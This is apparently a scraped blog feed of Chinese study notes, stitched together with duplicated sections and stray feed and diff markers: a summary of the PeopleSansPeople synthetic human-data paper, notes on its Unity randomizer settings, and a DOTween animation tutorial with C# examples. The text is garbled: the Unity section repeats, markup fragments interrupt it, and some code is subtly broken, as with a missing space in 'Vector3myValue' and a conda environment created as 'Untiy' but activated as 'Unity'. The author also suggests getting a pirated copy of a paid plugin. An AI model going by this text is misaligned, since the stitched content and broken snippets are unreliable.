      • Lens Distortion Intensity Parameter

        镜头畸变强度参数:$[-0.2, 0.2]$

      • Focus Distance Parameter

        景深焦距:$[0.1, 4]$

      • Contrast Parameter

        对比度:$[-30, 30]$

      • Saturation Parameter

        饱和度:$[-30, 30]$

    Post Process Volume

    jpg

    Sky and Fog Volume

    jpg

    Lights

    DirectionalLightSun

    jpg

    PointLight (1-6)

    jpg

    PointLightSceneMoving

    ​ 在 PointLight 的基础上多了一个 CustomLightPositionRotationRandomizerTag 组件。

    数据统计

    conda create -n Untiy python=3.7
    conda activate Unity
    pip install datasetinsights -i https://pypi.tuna.tsinghua.edu.cn/simple
    ]]>
    + 资源

    全文

    Abstract

    • 人脸检测和人体姿态估计的数据集多样性不够,还会受隐私、法律、安全和道德问题的影响。
    • 发布了一个以人为中心的合成数据生成器 PEOPLESANSPEOPLE。包含可模拟的 3D 人力资源、参数化照明和相机系统,并生成 2D 和 3D 边界框、实例和语义分割以及 COCO 姿势标签。
    • 使用 Detectron2 Keypoint R-CNN 变体进行了基准合成数据训练,以合成数据对网络进行预训练,使用真实数据进行微调,效果喜人。
    • 同样这个通过合成数据预训练的模型优于使用 ImageNet 预训练的模型。

    1 Introduction

    • 数据集需求量大。
    • 对于以人为中心的视觉任务来说,标记的数据越来越复杂。
    • 真实数据集涉及隐私和道德问题。
    • 一些动作的数据集难以采集。
    • 人工标注数据集容易出错。

    本文设计的合成数据生成器:PEOPLESANSPEOPLE,基于 Unity 和 Perception 软件包。包括:

    • macOS 和 Linux 二进制文件,能够使用 JSON 注释生成 1M 以上的大规模数据集
    • 28 个不同年龄和种族的 3D 人体模型,具有不同的服装、头发和皮肤颜色
    • 39 个动画剪辑,具有完全随机的人形位置、大小和旋转,以生成不同的人物安排;
    • 完全参数化的照明(位置、颜色、角度和强度)和相机设置;
    • 一组用作干扰物和遮挡物的对象基元;
    • 一组自然图像,用作对象的背景和纹理。

    除了上面提到的二进制文件外,我们还发布了一个 Unity 模板项目,通过帮助他们开始创建自己版本的以人为中心的数据生成器,帮助降低社区的进入门槛。此环境具有为二进制文件描述的全部功能,除了

    • 4 个不同服装颜色的3D人体模型示例;
    • 8 个示例动画剪辑,具有完全随机的人形放置、大小和旋转,以生成不同的人物安排;
    • Unity Perception 软件包中的一组杂货的自然图像,用作对象的背景和纹理。
    • 介绍一下合成数据生成器。

    • 领域随机化是一种通过随机化模拟器的参数来将多样性引入生成数据的技术。领域随机化已应用于包括物体检测、机器人操纵和自动驾驶汽车导航在内的任务。PEOPLESANSPEOPLE 使研究人员能够在涉及作为目标类别一部分的人的任务中使用具有领域随机化的合成数据,从而在现有和新领域扩展模拟器功能的空间,如自动驾驶汽车和人体姿态估计和跟踪。

    3 PEOPLESANSPEOPLE

    • PEOPLESANSPEOPLE 是一个参数化数据生成器,具有由各种姿势的 3D 人力资源和具有自然纹理的干扰对象填充的 3D 场景。我们将数据生成器打包为一个二进制文件,通过一个简单的 JSON 配置文件公开几个参数以供更改。

    • PEOPLESANSPEOPLE 通过 JSON 中的 2D 和 3D 边界框、语义和实例分割掩码以及 COCO 关键点标签为人力资源生成 RGB 图像和相应标签。此外,它还会发出用于统计比较和分析的场景元数据。

    3.1 3D Assets

    • PEOPLESANSPEOPLE拥有一套来自 RenderPeople 的 28 个扫描三维人体模型。这些模型在种族和年龄上都是多样化的,完全重新地形化、装配和蒙皮,具有高质量的纹理。

    • 我们不得不更改资产,以便在运行时操作服装的材料元素。具体来说,我们重新绘制了一些组成遮罩纹理的红色、绿色、蓝色和 alpha 通道。此外,我们在 Unity 中创建了一个 Shader Graph,它允许我们交换人力资源的材料元素,并更改衣服的色调和纹理。这些更改使我们能够将人体模型导入 Unity,将其放置在场景中,设置其动画,并更改其服装纹理和颜色。

    jpg

    PEOPLESANSPEOPLE 3D Human Models.
    a) 28 个扫描的 3D 人体模型,用于具有默认姿势和服装纹理的环境中。
    b) 由 PEOPLESANSPEOPLE 着色器图形启用的服装纹理变化的一个示例。
    • 为了为我们的人力资源生成不同的姿势,我们从 Mixamo 收集了一组 39 个动画,从空转、行走和跑步等简单动作到铺板、表演霹雳舞和打斗等更复杂的动作。我们以 24 帧/秒的速度下载了这些动画片段作为Unity 的 FBX,并且没有关键帧缩减。最后,我们确保将所有动画剪辑重新定位到我们的 RenderPeople 人力资源。

    3.2 Unity Environment

    • 我们使用 Unity 版本 2020.3.20f1 和 Unity 的 Perception 包0.9.0-preview.2 来开发 PEOPLESANSPELE。我们的 3D 场景包括背景墙、Perception 相机、一个定向光(太阳)、一个移动点光源和六个固定场景点光源。

    jpg

    PEOPLESANSPEOPLE Design.
    (a) 场景设置。该场景有一个背景墙、一个 Perception 相机、一个定向光(太阳)、一个移动点光源和六个固定点光源。
    (b), (c)和 (d) 示例模拟。每个图右下角的小相机预览窗格显示感知相机的渲染预览。我们更改墙背景纹理、点光源颜色、强度和位置,以及每帧中的阳光方向。我们还可以更改相机的视野、焦距、位置和方向。我们在墙前的场景中以不同的比例、姿势、服装纹理和围绕 Y 轴的旋转来生成人力资源。此外,我们在场景中生成具有不同方向、比例和纹理的原始遮挡对象。
    • 场景背景和照明 我们从一组 1600 幅自然图像中随机选择了一个背景墙纹理,这些图像取自 COCO 未标记的 2017 数据集。我们确保在这些自然图像中不会出现人类的照片(甚至是挂在墙上的人类相框)。我们还更改纹理的色调偏移。我们更改场景中六个点光源和一个平行光的颜色、强度和打开/关闭状态。此外,我们有一个移动的点光源,它可以改变位置和旋转。场景中的这组八个灯光产生不同的照明、阴影和场景外观。

    • Perception相机 Perception 相机扩展渲染过程以生成注释标签。在 PEOPLESANSPEOPLE 中,对于我们的基准实验,我们有一个对象类(人),我们为其生成 2D 边界框和人类关键点标签。使用 Unity Perception 软件包,我们可以包括语义和实例分割掩码以及 3D 边界框。

    • 我们的 2D 边界框和人体关键点遵循 COCO 数据集标准。关键点标签的可见性状态为:$v=0$ 未标记,$v=1$ 标记但不可见,$v=2$ 标记且可见,类似于 COCO。然而,我们不使用 $iscrowd=1$ 标签,因为即使在最拥挤的场景中,我们也可以生成亚像素完美标签。


    Perception 摄像头总共为用户提供了三种标签方案选择:

    • 可见对象

    • 可见和遮挡对象:在这种情况下,如果一个人被自己或另一个对象遮挡,则将其注释为可见($v=2$)。

    • 所有对象:在这种情况下,即使完全落在另一个对象后面的对象也会被注释。这对于人类跟踪和活动识别特别有用。


    • 场景中的对象 我们使用一组原始的 3D 游戏对象,例如立方体、圆柱体和球体,作为背景或遮挡/干扰对象。我们可以在场景中的任意位置、比例、方向、纹理和色调偏移处生成这些对象。我们使用与这些对象的背景墙相同的 COCO 未标记 2017 纹理。

    3.3 Domain Randomization

    • 为了使用可以推广到真实领域的合成数据来训练模型,我们依赖于领域随机化,其中模拟环境的各个方面被随机化,以将变化引入合成数据中。Unity Perception 软件包提供了一个领域随机化框架。在每一帧,随机化器作用于预定义的 Unity 场景组件。我们首先提供要随机化的组件的参数定义。然后我们定义我们希望这些参数如何分布。我们提供了正态分布、均匀分布和二项式分布,尽管也可以定义自定义分布。为了简单起见,PEOPLESANSPEOPLE 中的所有随机化器值都使用均匀分布。

    • 简言之,我们对 3D 对象的放置和姿势、场景中 3D 对象的纹理和颜色、照明的配置和颜色、相机参数以及一些后处理效果进行了随机化。某些类型的域随机化,如照明、色调偏移、相机旋转/视场/焦距,模拟标准数据增强的行为。因此,我们在合成数据训练期间不使用数据增强。

    我们的数据生成器中的领域随机化参数。

    jpg

    3.4 Data Generation

    在配备:

    • 2.3 GHz 8 核 Intel Core i9

    • AMD Radeon Pro 5500 M 4 GB

    • Intel UHD Graphics 630 1536 MB

    • 32 GB 2667 MHz DDR4内存

      的 MacBook Pro(16英寸,2019)上


    • PEOPLESANSPEOPLE 在大约 3 分钟内生成 $10\times10^3$ 图像、边界框和关键点标签。

    4 Experiments

    • 使用 Detectron2 Keypoint R-CNN 变体进行了基准合成数据训练,以合成数据对网络进行预训练,使用真实数据进行微调,并与 COCO 数据集作对比。

    4.1 Dataset Statistics

    jpg

    边界框占用热图。对于我们的基准实验,我们使用 640×640 的图像大小。我们使用填充框将所有边界框覆盖在图像上,以计算 COCO 个人和合成数据的边界框占用图。

    • 认为多样性也比那个基于给他爱的数据集要好。

    jpg

    与 COCO 相比,我们的合成数据集每个图像包含更多的实例(边界框)。

    4.2 Training

    将所有模型的:

    • 初始 learning rate 设置为 0.02
    • inital patience 设置为 38
    • 初始 epsilon 设置为 5
    • weight decay 设为 0.0001
    • momentum 设为 0.9
    • 在训练开始时执行 1000 次迭代的线性热身期(包括从头开始训练和迁移学习),在那里我们慢慢地将学习率提高到初始学习率
    • 我们使用 8 个 NVIDIA 特斯拉 V100 GPU,使用 synchronized SGD
      • 每个 GPU 的 mini-batch size 为 2。
    • 使用 ImageNet 的平均像素值和标准偏差来对模型中的图像进行归一化

    real-world dataset

    • 我们将 COCO 训练集划分为重叠的子集
      • 这些子集包含 641、6411、32057 和 64115 个图像,分别包含COCO训练集中的1%、10%、50% 和 100%,以研究 few-shot transfer。
      • 较小的集合是较大集合的子集。
    • 我们在 train 期间使用 person COCO验证集进行 validation。
    • 我们报告了我们使用 COCO test-dev2017 数据集进行的所有COCO训练数据实验的最终模型性能。
    • 我们为我们的合成数据集从 $3$ 个随机种子中生成了 $3$ 个 $500×10^3$ 图像的数据集。我们将它们分为 $490\times 10^3$ 训练集和 $10×10^3$ 验证集。我们使用合成验证集在纯合成数据上从头开始训练期间评估模型。
    • 训练后,我们使用 person COCO 验证和 test-dev2017 集合报告这些模型的性能。

    benchmark experiments

    • 我们首先从头开始训练我们的模型,并在 COCO 验证集和 COCO test-dev2017 集上评估它们的性能。
    • 其次,我们使用在合成数据上训练的模型的权重,并在有限的 COCO(真实)数据子集上对其进行微调,以进行 few-shot transfer。
    • 为了进行完整的比较,我们还使用 ImageNet 预训练的权重并对 COCO 数据子集进行微调。
    • 在 few-shot transfer 学习训练中,我们对所有网络层进行了重新训练。对于从头开始训练的模型和少镜头迁移学习,超参数和学习率时间表是相同的。

    5 Results

    • 仅使用合成数据效果还是差些,但是合成数据和真实数据混合就很好使了。

    5.1 Dicussion

    • 我们令人鼓舞的结果开启了对超参数搜索、优化策略、训练计划和替代训练策略的进一步研究,以弥合模拟与现实的差距。

    6 Conclusion and Limitations

    • 由于 RenderPeople 的再分配和许可政策,我们不提供对 3D 人力资产的直接访问;相反,我们提供了详细的说明和示例,用于采购和准备人力资产模拟。尽管预先制作的 PEOPLESANSPEOPLE 二进制文件无法实现复杂的资产结构化放置,但研究人员可以更新提供的随机化器,以允许不同的策略。

    代码

    该存储库提供了 PeopleSansPeople Unity 环境模板在 HDRP 中的版本。该项目包括自定义的随机化功能和一些由 Unity Technologies 提供的示例人类资源。

    该环境仍然提供了我们在论文中介绍的 PeopleSansPeople 的全部功能,以及我们提供的 Linux 和 macOS 二进制文件。鉴于我们没有重新分发许可证的第三方资产,我们提供以下示例资产/内容:

    • 4 个带有不同服装颜色但外观相同的 Unity 品牌资产。
    • 529 个 Unity 食品杂货纹理。
    • 8 个由 Unity 拥有的动画剪辑。

    该 Unity 环境的目的是使社区能够开始构建自己版本的以人为中心的数据生成器,降低进入门槛,并为他们提供与 **PeopleSansPeople **中存在的所有功能相同的功能。用户可以轻松地将该项目中的资产和内容与自己的资产进行替换,只要其属性与我们提供的示例资产相匹配即可。

    ​ 装一个 Unity 3.20f1,然后直接跑 PeopleSansPeople/peoplesanspeople_unity_env at main · Unity-Technologies/PeopleSansPeople (github.com),但不知道是哪里有问题,加载得贼慢,还容易卡死。emmmm

    第二天进来感觉正常了。

    jpg


    HumanScene.unity 中有如下对象:

    • Main Camera
    • Wall
    • Simulation Scenario
    • Post Process Volume
    • Sky and Fog Volume
    • Lights
      • DirectionalLightSun
      • PointLight1
      • PointLight2
      • PointLight3
      • PointLight4
      • PointLight5
      • PointLight6
      • PointLightSceneMoving

    Main Camera

    jpg

    Perception Camera

    • First capture at 0seconds and consecutive captures every 0.0166seconds of simulation time.

      在 0 秒处首次捕获,每 0.0166 秒模拟时间连续捕获一次。

    • Camera Labelers

      标注的数据有

      • BoundingBox2DLabeler

        2D 包围框

      • ObjectCountLabeler

        对象计数

      • RenderedObjectinfoLabeler

        渲染对象信息(这是干啥的?)

      • SemanticSegmentationLabeler

        语义分割

      • KeypointLabeler

        关键点

      • Animation Pose Configs

        动作动画

      • InstanceSegmentationLabeler

        实例分割

    CustomAnnotationAndMetricReporter

    ​ 这段代码是一个自定义的注解和指标报告器脚本,用于在 Unity 中使用 Perception 包合成数据集。下面是代码的主要含义:

    1. 通过添加 [RequireComponent(typeof(PerceptionCamera))] 属性,确保脚本附加到了带有 PerceptionCamera 组件的游戏对象上。(说明所有跟输出数据标注有关的都与 PerceptionCamera 有关)
    2. 定义了一些变量来存储指标的定义,例如光源位置、旋转、强度和颜色,以及摄像机位置、旋转、视野和焦距的指标定义。
    3. Start() 方法中,使用 DatasetCapture.RegisterMetricDefinition() 注册了所有的指标定义,并为每个指标定义分配了一个唯一的 ID。
    4. Update() 方法中,通过遍历 lightSources 数组,报告了每个光源的位置、旋转、强度和颜色。这里使用了 DatasetCapture.ReportMetric() 方法来报告指标的值。
    5. 还报告了摄像机的位置、旋转、视野和焦距。
    6. 注释掉的代码是一个示例,展示了如何在相机的局部空间计算目标物体的位置,并使用 GetComponent<PerceptionCamera>().SensorHandleReportAnnotationValues() 方法报告注释值。

    ​ 总之,这段代码的目的是在 Unity 中使用 Perception 包捕捉并报告指标和注释,其中包括光源和摄像机的位置、旋转、强度、颜色等信息,以及目标物体的边界框注释(注释部分被注释掉了)。

    CustomCameraRandomizerTag

    ​ 相机随机化的标签。

    Wall

    jpg

    HueOffsetRandomizerTag

    色调偏移随机化的标签。

    TextureRandomizerTag

    纹理随机化的标签。

    Background Object

    包含以下 Tag:

    • CustomBackgroundOccluderScaleRandomizerTag

      比例随机化的标签

    • HueOffsetRandomizerTag

      色调偏移随机化的标签

    • TextureRandomizerTag

      纹理随机化的标签

    • RotationRandomizerTag

      旋转随机化的标签

    Foreground Object

    jpg

    拥有:

    • Shader Graph Texture Randomizer Tag

      着色器纹理随机化的标签

    • Rotation Randomizer Tag

      旋转随机化的标签

    • Custom Foreground Rotation Randomizer

      前景物体旋转随机化的标签(我觉得把上面那个标签给覆盖了)

    • Labeling

      • 挂着人物和动作的标签
    • Animation Randomizer Tag

      动画随机化的标签

    • CustomForegroundScaleRandomizerTag

      前景物体缩放随机化的标签

    • Keypoint Occlusion Overrides

      关键点遮挡覆盖

      • Overrides the default occlusion distance values by a scalar. This is necessary for bodies with different body types (i.e. children should be less than one)
      • 用标量覆盖默认遮挡距离值。这对于不同体型的身体是必要的(即儿童应该小于一个)

    Simulation Scenario

    jpg

    Fixed Length Scenario

    Scenario Properties

    Scenario 通过应用随机化参数来控制模拟的执行流。确保场景中始终只有一个方案处于活动状态。

    Randomizers

    Randomizers 按以下顺序执行。您可以通过使用手柄向上或向下拖动随机发生器来更改顺序。

    • CustomBackgroundObjectPlacementRandomizer

      • 控制 background object 放置,X 轴和 Y 轴范围在 $[-7.5,7.5]$ 之间,Depth Vaule 即为 Z 轴,范围为 $[-10, 14]$。
      • 各个 background object 间隔不小于 $2.5$。
    • CustomBackgroundOccluderScaleRandomizer

      • 控制 background object 比例,范围在 $[1, 12]$ 之间。
    • CustomForegroundObjectPlacementRandomizer

      • 控制 foreground object 放置,X 轴和 Y 轴范围在 $[-7.5,7.5]$ 之间,Depth Vaule 即为 Z 轴,范围为 $[-9, 6]$。
      • 各个 foreground object 间隔不小于 3。
    • CustomForegroundScaleRandomizer

      • 控制 foreground object 比例,范围在 $[0.5, 3]$ 之间。
    • TextureRandomizer

      • 从列表中随机选一个纹理。
    • HueOffsetRandomizer

      • 色调偏移范围:$[-180, 180]$
    • RotationRandomizer

      • XYZ 轴 $[0, 360]$ 随机乱转。
    • CustomForegroundRotationRandomizer

      • 限制了只有 Y 轴可以 $[0, 360]$ 随机乱转,大概是为了确保生成的图片中人的脚垂直向下。
    • SundayAngleRandomizer

      • 随机化太阳光的
        • 小时
        • 日期
        • 纬度
    • AnimationRandomizer

      • 随机化动作,这里的相关逻辑写到了 AnimationRandomizerTag.cs 里?
    • ShaderGraphTextureRandomizer

      • 以下纹理 / 材质中从列表中随机选一项

        • Albedo Texture

          反照率纹理

        • Normal Texture

          法线纹理

        • Mask Texture

          遮罩纹理

        • Character Material

          人物材质

    • CustomCameraRandomizer

      • Camera Field Of View Parameter

        视野随机化范围 $[5, 50]$

      • Camera Focal Length Parameter

        焦距随机化范围 $[1, 23]$

      • Muliply Factor: $5$

        • Change Camera Position: $1$

          与初始位置的位置偏移,XYZ 轴范围 $[-5, 5]$

        • Change Camera Rotation: $1$

          初始旋转的旋转偏移,XYZ 轴范围 $[-5, 5]$

    • CustomLightRandomizer

      • Light Intensity Parameter
        • 范围 $[0, 1]$,但是在 CustomLightRandomizerTag 里还要乘个系数,所以最终亮度范围是 $[5000, 20000]$
      • Light Color Parameter
        • RGB 范围 $[0, 1]$,不透明度 A 恒为 1
      • Aux Parameter
        • 辅助参数,不知道干啥的,范围 $[0, 1]$
    • CustomLightPositionRotationRandomizer

      • Multiply Factor: $5$
      • Random Float: $[0, 1]$
      • Change Light Position: $0.73$
        • 灯光与初始位置的位置偏移:$[-3.65, 3.65]$($5\times 0.73=3.65$)
      • Change Light Rotation: $10$
        • 初始旋转的旋转偏移:$[-50, 50]$($10\times5=50$)
    • CustomPostProcessVolumeRandomizer

      后期处理随机化器

      • Vignette Intensity Parameter

        渐晕强度:$[0, 0.5]$

      • Fixed Exposure Parameter

        固定曝光:$[5, 10]$

      • White Balance Temperature Parameter

        白平衡色温:$[-20, 20]$

      • Film Grain Intensity Parameter

        薄膜颗粒强度参数:$[0, 1]$

      • Lens Distortion Intensity Parameter

        镜头畸变强度参数:$[-0.2, 0.2]$

      • Focus Distance Parameter

        景深焦距:$[0.1, 4]$

      • Contrast Parameter

        对比度:$[-30, 30]$

      • Saturation Parameter

        饱和度:$[-30, 30]$

    Post Process Volume

    jpg

    Sky and Fog Volume

    jpg

    Lights

    DirectionalLightSun

    jpg

    PointLight (1-6)

    jpg

    PointLightSceneMoving

    ​ 在 PointLight 的基础上多了一个 CustomLightPositionRotationRandomizerTag 组件。

    数据统计

    1
    2
    3
    conda create -n Untiy python=3.7
    conda activate Unity
    pip install datasetinsights -i https://pypi.tuna.tsinghua.edu.cn/simple
    ]]>
    @@ -4988,7 +4988,7 @@ /posts/Unity-DOTween/ - 资源

    课程

    01-DOTween 动画插件介绍和导入

    从 Untiy Assetstore DOTween Pro | 可视化脚本 | Unity Asset Store 下载 DoTween 要 $15……去网上整个盗版的吧。

    DOTween 官网,如果要详细学习,建议通读官网文档:

    官网上显示 DOTween 业界领先!

    jpg

    DOTween 可视作 HOTween 的 V2 版本。

    02-如何对变量进行动画

    场景里绑个类测试下:

    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3myValue = new Vector3(0, 0, 0);

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }
    }

    DOTween.To() 方法是 DOTween 插件中的一个静态方法,用于创建一个动画序列。它接受四个参数:起始值 Getter、更新值 Setter、目标值和动画持续时间。

    1. () => myValue 是一个 Lambda 表达式,表示获取当前的 myValue 值作为动画的起始值。这个值将在动画开始时被记录下来。
    2. x => myValue = x 也是一个 Lambda 表达式,表示将动画计算出的 x 值赋给 myValue。在动画执行的过程中,DOTween 将不断计算新的 x 值,并调用这个 Lambda 表达式来将其赋值给 myValue。
    3. new Vector3(10, 10, 10) 表示动画的目标值。在这个例子中,目标值是一个三维向量 (Vector3),具体数值为 (10, 10, 10)。
    4. 2 表示动画的持续时间,单位为秒。在这个例子中,动画将在 2 秒内从起始值过渡到目标值。

    综上所述,这行代码的含义是创建一个以 myValue 作为起始值的动画,将 myValue 从起始值逐渐过渡到目标值 Vector3(10, 10, 10),过渡时间为 2 秒。在动画过程中,myValue 将会不断更新,并且最终等于目标值。


    开跑!这个值变化的速率是先快后慢的。

    jpg

    03-控制Cube和UI面板的动画

    Update() 中,将 myValueCude Transform 绑定:

    jpg

    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3 myValue = new Vector3(0, 0, 0);
    public Transform cubeTransform = null;

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }

    // Update is called once per frame
    void Update()
    {
    cubeTransform.position = myValue;
    }
    }

    同理,对于 UI 面板,在 Update() 中,将 myValuetaskPanelTransform 绑定:

    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3myValue = new Vector3(600, 0, 0);
    public Transform taskPanelTransform = null;

    // Start is called before the first frame update
    void Start()
    {
    DOTween.To(() => myValue, x => myValue = x, new Vector3(0, 0, 0), 2);
    }

    // Update is called once per frame
    void Update()
    {
    taskPanelTransform.localPosition = myValue;
    }
    }


    DOTween.To() 不仅适用于 Vector3float 也是适用的:

    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public float myValue2 = 0;

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue2, x => myValue2 = x, 10, 2);
    }
    }

    04-动画的快捷播放方式

    Ctrl + N 可以直接创建一个新场景,学到了。


    设计一个按钮,按下后面板就移动到视图内:

    jpg

    下述方法对 UI 不好使:

    public void OnClick()
    {
    // 让 panelTransform 从当前位置 动画到 0, 0, 0 的位置,时间为 1 秒(修改的是世界坐标)
    // 可是我们 UI 上的是局部坐标啊?
    panelTransform.DOMove(new Vector3(0, 0, 0), 1);
    }

    我这个修改局部坐标的好使:

    public void OnClick()
    {
    panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1);
    }

    05-动画的前放和倒放

    panelTransform.DOPlayBackwards(); 可以让绑定在 panelTransform 上的动画倒放。

    错误示范:

    由于 默认动画完成后会被销毁,所以在动画播放完后是不能倒放的。

    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
    if (!isIn)
    {
    panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    错误示范 2:

    DOLocalMove() 会创建一个 Tweener 对象,将自动销毁设为 false

    但是每次按一次按钮都会创建一个动画对象,造成资源浪费。

    jpg

    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
    if (!isIn)
    {
    Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    错误示范 3:

    tweener.Play() 只会让动画播放一次。

    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;
    private Tweener tweener;
    // Start is called before the first frame update
    void Start()
    {
    tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    tweener.Pause();
    }

    public void OnClick()
    {
    if (!isIn)
    {
    tweener.Play();
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    正确示范:

    DOPlayForward() 是正放,与 DOPlayBackwards() 相对应。

    执行 panelTransform.DOPlayForward() 会执行这个对象上关联的所有动画。

    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;
    // Start is called before the first frame update
    void Start()
    {
    Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    tweener.Pause();
    }

    // Update is called once per frame
    void Update()
    {

    }

    public void OnClick()
    {
    if (!isIn)
    {
    panelTransform.DOPlayForward(); // 前放
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards(); // 倒放
    isIn = false;
    }
    }
    }

    06-From Tweens

    给一个 Cube 对象绑定代码:

    using UnityEngine;
    using DG.Tweening;

    public class MyCube : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 默认是从当前位置移动到目标位置 加上 From() 方法以后表示从目标位置移动到当前位置
    transform.DOMoveX(5, 3).From(true);
    }
    }

    transform.DOMoveX(5, 3) 方法是 DOTween 插件的扩展方法,用于创建一个移动物体的动画序列。它接受两个参数:目标位置和动画持续时间。

    1. 5 表示物体移动的目标位置。在这个例子中,目标位置是X轴上的坐标为5。
    2. 3 表示动画的持续时间,单位为秒。在这个例子中,动画将在3秒内完成物体从当前位置到目标位置的移动。

    .From(true) 是 DOTween 链式调用中的一个方法,表示将动画的起始位置设置为目标位置,并且播放反转动画。这意味着物体将从目标位置开始沿着 X 轴反向移动至当前位置,然后再回到目标位置。

    综上所述,这行代码的含义是创建一个物体移动的动画序列,让物体从当前位置开始沿着 X 轴移动到坐标为 5 的位置,移动时间为 3 秒,并且以目标位置为起点,播放反转动画使物体从目标位置返回当前位置。

    07-动画的属性设置(动画曲线和事件函数)

    using UnityEngine;
    using DG.Tweening;

    public class MyPanel : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    Tweener tweener = transform.DOLocalMoveX(0, 2);
    tweener.SetEase(Ease.OutBack);
    tweener.SetLoops(2);
    tweener.OnComplete(OnTweenComplete);
    }

    void OnTweenComplete()
    {
    Debug.Log("动画播放完成了");
    }
    }

    这段代码使用了 DOTween 插件来创建一个移动物体的动画序列,并设置了一些额外的效果和回调函数。

    1. transform.DOLocalMoveX(0, 2) 是 DOTween 插件的扩展方法,用于创建一个将物体在本地坐标系下沿着 X 轴移动到指定位置的动画序列。它接受两个参数:目标位置和动画持续时间。
      • 0 表示物体移动的目标位置。在这个例子中,目标位置是 X 轴上的坐标为 0。
      • 2 表示动画的持续时间,单位为秒。在这个例子中,动画将在 2 秒内完成物体从当前位置到目标位置的移动。
    2. tweener.SetEase(Ease.OutBack) 是设置动画的缓动效果。Ease.OutBack 表示应用一种反弹效果的缓动曲线,使得动画在结束时会有一个回弹的效果。
    3. tweener.SetLoops(2) 是设置动画的循环次数。这里将动画循环播放 2 次,即播放完正向动画后再重新播放一次。
    4. tweener.OnComplete(OnTweenComplete) 是设置动画完成时的回调函数。OnTweenComplete 是一个自定义的回调函数,在动画完成时将被调用。

    综上所述,这段代码的含义是创建一个物体移动的动画序列,让物体在本地坐标系下沿着 X 轴移动到坐标为 0 的位置,移动时间为 2 秒。动画应用反弹效果的缓动曲线,循环播放两次。当动画完成时,将调用自定义的回调函数 OnTweenComplete

    08-动画的生命周期和生命周期函数

    A tween’s life

    • When you create a tween it will play automatically (unless you change the global defaultAutoPlay behaviour) until it completes all its loops.

    • When a tween is complete it is automatically killed (unless you change the global defaultAutoKill behaviour), which means you won’t be able to use it anymore.

    • If you want to reuse the same tween, just set its autoKill behaviour to FALSE (either by changing the global autoKill settings for all tweens, or by chaining SetAutoKill(false) to your tween).

    • If your tween’s target becomes NULL while a tween is playing errors might happen. You’ll have to either be careful or activate the safe mode


    emmm 其它的还是叫我去看文档。

    09-对话框文字动画

    jpg

    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class MyText : MonoBehaviour
    {
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    text = this.GetComponent<Text>();
    text.DOText("接下来,我们进入第二篇章", 5);
    }
    }

    这段代码使用了 DOTween 插件来创建一个文本逐字显示的动画序列。

    1. text = this.GetComponent<Text>() 用于获取当前游戏对象(GameObject)上的 Text 组件。这样可以通过 text 变量来引用该组件。
    2. text.DOText("接下来,我们进入第二篇章", 5) 是 DOTween 插件的扩展方法,用于创建一个逐字显示文本的动画序列。它接受两个参数:目标文本和动画持续时间。
      • "接下来,我们进入第二篇章" 是目标文本,即要逐字显示的文本内容。
      • 5 是动画的持续时间,单位为秒。在这个例子中,文本将会在 5 秒内逐字显示完整。

    综上所述,这段代码的含义是获取当前游戏对象上的 Text 组件并创建一个逐字显示文本的动画序列,将文本内容逐字显示为 “接下来,我们进入第二篇章”,并且动画持续时间为 5 秒。这样,在播放动画期间,文本将会逐字逐渐显示出来。

    10-屏幕震动效果

    给 Camera 添加一个类:

    jpg

    这段代码使用了 DOTween 插件来创建一个位置抖动的动画序列。

    transform.DOShakePosition(10, new Vector3(1, 1, 0)) 是 DOTween 插件的扩展方法,用于创建一个物体位置抖动的动画序列。它接受两个参数:抖动的持续时间和抖动的强度向量。

